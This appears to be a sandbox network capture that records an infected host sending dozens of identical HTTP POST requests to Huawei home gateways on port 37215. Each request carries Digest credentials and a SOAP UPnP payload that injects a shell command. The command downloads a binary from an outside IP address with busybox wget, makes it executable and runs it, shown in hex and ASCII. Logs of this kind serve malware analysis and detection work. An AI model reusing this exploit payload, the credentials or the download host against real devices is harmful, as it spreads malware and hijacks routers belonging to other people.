                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1462192.168.2.153854041.57.245.4237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734896898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1463192.168.2.154232441.185.239.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734915972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1464192.168.2.153955641.68.121.10737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734918118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1465192.168.2.154424041.20.21.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734966040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1466192.168.2.154683241.56.50.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734966040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1467192.168.2.155156641.250.233.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734987974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1468192.168.2.154051841.192.188.937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.735023022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1469192.168.2.155651241.172.47.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.735025883 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1470192.168.2.154823041.49.100.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.735059023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1471192.168.2.154812641.177.90.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.735066891 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 